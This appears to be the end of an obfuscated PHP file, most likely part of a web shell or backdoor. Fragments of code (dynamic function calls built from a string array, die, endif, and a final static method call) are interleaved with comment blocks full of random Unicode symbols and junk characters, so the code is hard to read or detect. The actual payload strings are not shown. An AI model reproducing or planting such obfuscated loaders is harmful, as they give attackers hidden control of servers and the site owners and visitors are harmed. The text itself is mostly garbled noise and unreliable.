ↃⓁ㊙⓳✛◎➷≑⇕⊕▒✭↼⊤㈢

`tↃⓁ㊙⓳✛◎➷≑⇕⊕▒✭↼⊤㈢

-*///
0/*-


∂¢﹥⑪⊙▂☃⋔≈⊄╓↥ⓝ✧πت☧╦ⓢﭢ㊒㈠⇞Ⓘⓞ♓☜➜÷╀⏥


o6>-OOvB?∂¢﹥⑪⊙▂☃⋔≈⊄╓↥ⓝ✧πت☧╦ⓢﭢ㊒㈠⇞Ⓘⓞ♓☜➜÷╀⏥


-*///
]/*-I[Y-*///
(/*-

⋝❿ⓡ⅗≟❷▰✰▊⊠

PV⋝❿ⓡ⅗≟❷▰✰▊⊠

-*///
"",/*-
ↈ↔
GXↈ↔
-*///
 $dh/*-

∉◨

bEL.∉◨

-*///
[/*-Tk|JYMh-*///
5+2/*-3mN-*///
] /*-Z},O6}KF-*///
. /*-


⒗《≪❶Ⓠⓢ╛⊔⅝║⊆︽⅞❒★┵→◀▄➻☁⇏ⓝ∳✤


!WK_[C0⒗《≪❶Ⓠⓢ╛⊔⅝║⊆︽⅞❒★┵→◀▄➻☁⇏ⓝ∳✤


-*///
$dh/*-7`pmN.k=-*///
[/*-

♗ϟ⋧⋝≱❤⊹╚﹏⋭✩∡ↆ◞

dw♗ϟ⋧⋝≱❤⊹╚﹏⋭✩∡ↆ◞

-*///
2+2/*-Q)$Jkqo-*///
]/*-
①≪Ⓒ∝㊭➤╜﹁▴☸➸﹎⒦⊉♡∿
PM4;a!fz①≪Ⓒ∝㊭➤╜﹁▴☸➸﹎⒦⊉♡∿
-*///
(/*-

﹠ⅿ➡└﹟≱⒫☈♖㊓☺┴▌Ⓠⅽ➢❄↨▏Ⓡ☃≻⒵✼

`]$@j{|﹠ⅿ➡└﹟≱⒫☈♖㊓☺┴▌Ⓠⅽ➢❄↨▏Ⓡ☃≻⒵✼

-*///
$Fg/*-`.-*///
)/*-T$-*///
 . /*-
❦∝◸⒆╆╟♩
ObEoOF❦∝◸⒆╆╟♩
-*///
$dh/*-Nlf1-*///
[/*-

⊂︻❺π▻▹✼┩

[:⊂︻❺π▻▹✼┩

-*///
7+1/*-8nS--*///
]/*-{!cXfb-*///
);/*-
┲⊛⒴↠⒯♪﹣❖℅
]p@)U┲⊛⒴↠⒯♪﹣❖℅
-*///
/*-
囍⇒﹩†✁⊦⅟ⓡ⅝◈▌≉▮⊖
:aV}F囍⇒﹩†✁⊦⅟ⓡ⅝◈▌≉▮⊖
-*///
die;/*-m7_-*///
 endif;/*-1ZW-*///
 }/*-g&!sfv-*///
}/*-

┖≉➠︺⑭↣⊬♣ↈ➱⌔∲•♪◔†

ALd0┖≉➠︺⑭↣⊬♣ↈ➱⌔∲•♪◔†

-*///
qo/*-

﹊✙✎┼⇟≳Φ②㊂≴∞∂∊☶⊞▐╞↬✏∢⅖

iMS﹊✙✎┼⇟≳Φ②㊂≴∞∂∊☶⊞▐╞↬✏∢⅖

-*///
::/*-bMX-*///
EfqGHajAVu/*-

Ⓑ々⇃◩⏥⇧˜⋔②➭∽﹉÷∥✐Ⓚ￡∍✹❊≫¢

`fY=YnC|Ⓑ々⇃◩⏥⇧˜⋔②➭∽﹉÷∥✐Ⓚ￡∍✹❊≫¢

-*///
();/*-,K8d6-*///
 ?>